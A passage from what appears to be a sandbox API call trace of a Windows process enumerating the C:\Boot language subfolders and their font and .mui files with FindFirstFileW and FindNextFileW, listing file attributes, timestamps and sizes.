ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef95f141, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x26255, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0284.874] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef96ef3e, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0284.874] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c0da69, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef97d9ab, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x14f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0284.874] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef98c419, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x150a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0284.874] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0284.874] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0284.874] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0284.876] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.876] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0284.876] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.876] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-CA\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948068 [0285.014] FindNextFileW (in: hFindFile=0x3948068, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.014] FindNextFileW (in: hFindFile=0x3948068, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.014] FindNextFileW (in: hFindFile=0x3948068, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.014] FindClose (in: hFindFile=0x3948068 | out: hFindFile=0x3948068) returned 1 [0285.014] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.014] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0285.015] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.015] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947de8 [0285.022] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.022] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.023] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.023] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.023] FindClose (in: hFindFile=0x3947de8 | out: hFindFile=0x3947de8) returned 1 [0285.023] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.023] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0285.023] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.023] FindFirstFileW (in: lpFileName="C:\\Boot\\hr-HR\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0285.028] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.028] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.028] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.028] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0285.028] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.028] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0285.028] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.028] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948268 [0285.029] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.029] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.029] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.029] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.029] FindClose (in: hFindFile=0x3948268 | out: hFindFile=0x3948268) returned 1 [0285.029] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.029] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0285.030] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.030] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947c28 [0285.032] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.033] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.033] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.033] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.033] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0285.033] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.033] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0285.033] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.033] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947de8 [0285.034] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.034] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48c6596, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.035] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.035] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.035] FindClose (in: hFindFile=0x3947de8 | out: hFindFile=0x3947de8) returned 1 [0285.035] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.035] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0285.035] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.035] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0285.036] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.036] FindNextFileW (in: 